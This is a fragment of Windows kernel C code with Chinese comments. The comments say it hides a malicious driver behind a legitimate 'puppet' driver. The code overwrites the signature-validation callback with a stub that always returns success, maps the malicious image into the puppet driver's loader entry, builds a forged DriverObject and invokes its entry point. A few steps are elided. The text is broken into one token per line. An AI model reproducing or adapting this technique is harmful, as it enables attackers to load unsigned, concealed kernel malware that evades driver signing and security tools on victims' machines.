/
/
将 恶意驱动 伪装成 傀儡驱动
/
/
自建注册表服务,以 ServiceName 命名
略,详情请看代码;
/
/
Patch 签名校验 可省略,看你需要加载的驱动是否有签名
CIFun
=
*
Pqword_14040EF40;
*
Pqword_14040EF40
=
MySeValidateImageHeader;
/
/
换成我们的函数,这个函数返回 STATUS_SUCCESS
/
/
获取 恶意驱动的 DriverSection 和 傀儡驱动的 DriverSection
status
=
MiObtainSectionForDriver(&AString, &ADrvPathUn,
0
,
0
, &PADriverSection);
status
=
MiObtainSectionForDriver(&OString, &ODrvPathUn,
0
,
0
, &PODriverSection);
/
/
对恶意驱动 进行映射
Section
=
*
(PULONG64)(PADriverSection
+
SectionOffset);
DllBase
=
MiGetSystemAddressForImage(Section,
0
, &un);
status
=
MiMapSystemImage(Section, DllBase);
Head
=
RtlImageNtHeader(DllBase);
DllSize
=
*
(PULONG32)(Head
+
0x50
);
/
/
恢复patch 可省略,看你需要加载的驱动是否有签名
*
Pqword_14040EF40
=
CIFun;
/
/
将恶意驱动信息填入 傀儡驱动DriverSection 并提交(加入PsLoadedModuleList链表)
PODriverSection
-
>SizeOfImage
=
DllSize;
PODriverSection
-
>DllBase
=
DllBase;
status
=
MiConstructLoaderEntry(PODriverSection, &OutU, &OString,
0
,
1
, &NewPODriverSection);
/
/
修复IAT
略;
/
/
修复_security_cookie
略;
/
/
修复 WDF(可选)
略,这一部分是因为 WDF的驱动 DriverEntry 内有一些特殊操作,不修复就会蓝屏,WDM驱动就没有这个问题;
/
/
构造 DriverObject ,并填入信息(恶意驱动的信息) ,然后 加入 全局
Object
表
status
=
ObCreateObjectEx(
0
,
*
PIoDriverObjectType, &att,
0
, &Out,
0x1A0
,
0
,
0
, &PTDrvObj,
0
);
memset(PTDrvObj,
0
,
0x1a0
);
PTDrvObj
-
>DriverExtension
=
&PTDrvObj[
1
];
*
(PULONG64)(&PTDrvObj[
1
])
=
&PTDrvObj[
0
];
for
(
int
i
=
0
; i <
=
IRP_MJ_MAXIMUM_FUNCTION; i
+
+
) {
PTDrvObj
-
>MajorFunction[i]
=
PIopInvalidDeviceRequest;
}
PTDrvObj
-
>
Type
=
4
; PTDrvObj
-
>Size
=
0x150
;
PTDrvObj
-
>DriverInit
=
NewPODriverSection
-
>EntryPoint;
PTDrvObj
-
>DriverSection
=
NewPODriverSection;
PTDrvObj
-
>DriverStart
=
DllBase;
PTDrvObj
-
>DriverSize
=
DllSize;
PTDrvObj
-
>Flags |
=
2
;
status
=
ObInsertObjectEx(PTDrvObj,
0
,
1
,
0
,
0
,
0
, &DrvH);
status
=
ObReferenceObjectByHandle(DrvH,
0
,
*
PIoDriverObjectType,
0
, &PTDrvObj, NULL);
ZwClose(DrvH);
PTDrvObj
-
>HardwareDatabase
=
PCmRegistryMachineHardwareDescriptionSystemName;
PTDrvObj
-
>DriverName.
Buffer
=
ExAllocatePool(NonPagedPool, ObjectName.MaximumLength);
PTDrvObj
-
>DriverName.Length
=
ObjectName.Length;
PTDrvObj
-
>DriverName.MaximumLength
=
ObjectName.MaximumLength;
memcpy(PTDrvObj
-
>DriverName.
Buffer
, ObjectName.
Buffer
, ObjectName.MaximumLength);
/
/
ObjectName 是
"\\Driver\\XXX"
/
/
调用DriverEntry
status
=
ZwQueryObject(HRegistry,
1
, PSTR,
0x1000
, &NtQueryObjReturnLen);
PTDrvObj
-
>DriverInit(PTDrvObj,PSTR);
/
/
提交设备
IopReadyDeviceObjects(PTDrvObj);